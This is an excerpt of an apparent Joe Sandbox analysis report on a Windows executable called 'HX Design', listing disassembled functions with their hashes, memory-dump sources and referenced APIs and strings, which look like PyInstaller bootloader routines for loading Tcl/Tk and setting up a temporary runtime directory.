Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
Instruction ID: bf3c30cff7d99bd7ca429dddb5704f1d07607634e330d7d9a36a050794944a55
Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
Instruction Fuzzy Hash: ECC17E762181E08BD289EB29E46947A73E1F78930DBD5406BEF8747BC5C73CA514EB20

Function 00007FF732072C10 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
Instruction ID: ff110b6f79546af53fac83eb1db10f863cbb1d644e841f1b8a6e4f96787e4de5
Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
Instruction Fuzzy Hash: 28B19D7290878599E764EF3DC05023CBBB0E749B48FA94136CA4E47395CFB9D849E760

Function 00007FF73207E570 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
Instruction ID: f6064a34e888272e87fa1d5996f7d65e687b994f4ba33a9bc8c44acbd206fb49
Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
Instruction Fuzzy Hash: 2581F172A0938156EBB4EF1DA48037AAA91FB457D4F904235DB8D43B99DF7CE008DB50

Function 00007FF732086418 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 15e29a2b048034b7d11d1b87b7baa88ea743f66ca2db996e50da050e1c2114ce
Instruction ID: 868fa243172c45ec23a33c20b1b7242afd832503e38f56ef4c0ed5cdb98202cb
Opcode Fuzzy Hash: 15e29a2b048034b7d11d1b87b7baa88ea743f66ca2db996e50da050e1c2114ce
Instruction Fuzzy Hash: B5610822E0829666F764AA68945063FE6C0EF50770FD60239D71D47AD5DEFDE808E720

Function 00007FF732071944 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: 51a7d2051df7089d72c9e5e1d3d6f6d26125544614690604802e0a5dc62716b3
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: 6451A436A1865196E724AF2DC040278F7A0EB44F68F644131CE8D177D4DBBAEC4BE7A0

Function 00007FF732072164 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: 2ae800ae71c65ae086046ae7dcf51101f4fed2b7bb3170807e4b0465e3882459
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: F951C436A18651AAE724BB2DC440238B3A1FB64F68F644135CE4C07794CFBAEC57E760

Function 00007FF732071D54 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: 741ebe5ca5d4adeecd3ee0b768507267f9cc369b6550629756310ff983f1a8c2
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: 2051C376A18A5192E724AB2DD040338F3A0EB45F68F644131CE8D077D4DBBAEC57DB50

Function 00007FF732071B50 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 0f98639aca6c7ab6e157aeffeb74986bfcc54573389794c3decdce85531bf8a6
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: 2351AF76A1865196E724AF2DC040238E7B1EB45F58FA44131CE4C177D4DBBAEC4AE7A0

Function 00007FF732071740 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: 62b514e199dff4de0d4ecce76e656f1f9e09b843b03b786435151ffd0beacfde
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: 9D518F76A1865196E764AB2DC04023CE7B1EB45F58FA44131CE4C17BD4CFBAE847E790

Function 00007FF732071F60 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: 5b20b8a00e9d9958e357b0f32b63b0768d4c7fc0b6912fc6b067a955fba02076
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: B151A336B1865599E724AB2DC044338B7A0EB44F58FA44131CE4C177E9CBBAE847E7A0

Function 00007FF732075D30 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: cee439886fb64e256b382b5e22d93946b9280dd6cf42b629edd93405d5d68e67
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 8F41B56280D78A15E9B9B99C05086F8AE809F127A0DD852B4DDAD173D3DD4D698EE130

Function 00007FF732079EA0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
Instruction ID: 4074a9f1b9beed3ac8ea7f3aaad549a410162d54a9d6a70f06e9c2921df0959f
Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
Instruction Fuzzy Hash: 2A412132714A4482EF04EF2AD914579A3A1FB88FC0B889037EE0D97B68EE7DC446D300

Function 00007FF7320780E4 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction ID: 749dbedda7f253a8327bfc5ae8ec5e8d75cef7b44423f37e187cca76816f3b84
Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction Fuzzy Hash: 3631B632B09B4151E754BF29A48013EEAD9AF84BD0F944238EA4D53BD5DF7CD016E714

Function 00007FF732089570 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
Instruction ID: 0059e3c71f0fc67123dfa2a23cee270d0446143cdfe2b665034f2386f08e6e3a
Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
Instruction Fuzzy Hash: 7FF068727182959BDBD89F69A442629B7D0F7483C0FC09039D58D83B04DA7CD055DF24

Function 00007FF73206D30C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
Instruction ID: 89fd4544a2d122a5544f3237706d75d4f966f964c44629fae0c4a0e20f699198
Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
Instruction Fuzzy Hash: 5AA00231E0CC1AF0E644AB01E8E0036A330FB65310BC40031E02DA10B09FBCA50CF325

Function 00007FF7320676C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7320676D7
GetLastError.KERNEL32 ref: 00007FF7320676E9
GetProcAddress.KERNEL32 ref: 00007FF732067725
GetLastError.KERNEL32 ref: 00007FF732067737
GetProcAddress.KERNEL32 ref: 00007FF732067750
GetLastError.KERNEL32 ref: 00007FF732067762
GetProcAddress.KERNEL32 ref: 00007FF73206777B
GetLastError.KERNEL32 ref: 00007FF73206778D
GetProcAddress.KERNEL32 ref: 00007FF7320677A9
GetLastError.KERNEL32 ref: 00007FF7320677BB
GetProcAddress.KERNEL32 ref: 00007FF7320677D7
GetLastError.KERNEL32 ref: 00007FF7320677E9
GetProcAddress.KERNEL32 ref: 00007FF732067805
GetLastError.KERNEL32 ref: 00007FF732067817
GetProcAddress.KERNEL32 ref: 00007FF732067833
GetLastError.KERNEL32 ref: 00007FF732067845
GetProcAddress.KERNEL32 ref: 00007FF732067861
GetLastError.KERNEL32 ref: 00007FF732067873

Strings

Tcl_SetVar2, xrefs: 00007FF732067A51, 00007FF732067A73
Tcl_GetObjResult, xrefs: 00007FF732067B65, 00007FF732067B87
Tcl_CreateInterp, xrefs: 00007FF73206771B, 00007FF73206773D
Tcl_MutexUnlock, xrefs: 00007FF7320678E1, 00007FF732067903
Tcl_ConditionFinalize, xrefs: 00007FF73206793D, 00007FF73206795F
Tcl_Finalize, xrefs: 00007FF73206779F, 00007FF7320677C1
Tcl_MutexLock, xrefs: 00007FF7320678B3, 00007FF7320678D5
Tcl_MutexFinalize, xrefs: 00007FF73206790F, 00007FF732067931
Tk_GetNumMainWindows, xrefs: 00007FF732067CA7, 00007FF732067CC9
Tcl_GetCurrentThread, xrefs: 00007FF732067857, 00007FF732067879
Tcl_SetVar2Ex, xrefs: 00007FF732067B37, 00007FF732067B59
Tcl_FinalizeThread, xrefs: 00007FF7320677CD, 00007FF7320677EF
Tcl_DeleteInterp, xrefs: 00007FF7320677FB, 00007FF73206781D
Tcl_EvalFile, xrefs: 00007FF732067B93, 00007FF732067BB5
Tcl_ThreadQueueEvent, xrefs: 00007FF7320679C7, 00007FF7320679E9
Tcl_Free, xrefs: 00007FF732067C4B, 00007FF732067C6D
Tk_Init, xrefs: 00007FF732067C79, 00007FF732067C9B
Tcl_ThreadAlert, xrefs: 00007FF7320679F5, 00007FF732067A17
Tcl_DoOneEvent, xrefs: 00007FF732067771, 00007FF732067793
GetProcAddress, xrefs: 00007FF7320676FF
Tcl_NewByteArrayObj, xrefs: 00007FF732067B09, 00007FF732067B2B
Tcl_Init, xrefs: 00007FF7320676D0, 00007FF7320676EF
Tcl_FindExecutable, xrefs: 00007FF732067746, 00007FF732067768
Tcl_NewStringObj, xrefs: 00007FF732067ADB, 00007FF732067AFD
Tcl_CreateThread, xrefs: 00007FF732067829, 00007FF73206784B
Tcl_ConditionNotify, xrefs: 00007FF73206796B, 00007FF73206798D
Tcl_GetString, xrefs: 00007FF732067AAD, 00007FF732067ACF
Tcl_Alloc, xrefs: 00007FF732067C1D, 00007FF732067C3F
Tcl_EvalEx, xrefs: 00007FF732067BC1, 00007FF732067BE3
Failed to get address for %hs, xrefs: 00007FF7320676F8
Tcl_ConditionWait, xrefs: 00007FF732067999, 00007FF7320679BB
Tcl_GetVar2, xrefs: 00007FF732067A23, 00007FF732067A45
Tcl_CreateObjCommand, xrefs: 00007FF732067A7F, 00007FF732067AA1
Tcl_EvalObjv, xrefs: 00007FF732067BEF, 00007FF732067C11
Tcl_JoinThread, xrefs: 00007FF732067885, 00007FF7320678A7

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction ID: f5d0253a2f235e63eca7eff849e115442d0b3fb2dbded6db7d7acb36cff9dba5
Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction Fuzzy Hash: B402C124A09B07B1FA54BB64B8509B6A3A1FF04B54FD41235D83E422A0EFBCB54DF634

Function 00007FF7320681D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF732069390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7320645F4,00000000,00007FF732061985), ref: 00007FF7320693C9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF7320686B7,?,?,00000000,00007FF732063CBB), ref: 00007FF73206822C

Part of subcall function 00007FF732062810: MessageBoxW.USER32 ref: 00007FF7320628EA

Strings

LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7320682D9
%.*s, xrefs: 00007FF73206830C
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF732068203
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF73206829D
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF732068373
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF732068240
CreateDirectory, xrefs: 00007FF73206837C
\, xrefs: 00007FF732068261

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
Instruction ID: 964905228b4dafa14bf1a6c678240bb15110a8afe0d74907b583647b33bf960f
Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
Instruction Fuzzy Hash: 7B51A611B19643A1FA50BB25E8956BAE3A0EF84780FC44431D60E826D5FEFCE40CE324

Function 00007FF732062180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7320621AB
SelectObject.GDI32 ref: 00007FF7320621F2
DrawTextW.USER32 ref: 00007FF732062215
SelectObject.GDI32 ref: 00007FF73206222B
ReleaseDC.USER32 ref: 00007FF73206223B
MoveWindow.USER32 ref: 00007FF73206228B
MoveWindow.USER32 ref: 00007FF7320622CB
MoveWindow.USER32 ref: 00007FF73206231E
MoveWindow.USER32 ref: 00007FF732062366

Strings

P%, xrefs: 00007FF7320621FF

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 0f3360b149681b7e4b9c729e51ed2cd11bf70a3dffbc8e03530394cc07474e5d
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: FA51E526604BA187D624AF26A4181BAB7A1F798B61F404131EBDE83695DF7CD089DB20

Function 00007FF7320680C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF7320680FF
GetWindowLongPtrW.USER32 ref: 00007FF73206817F
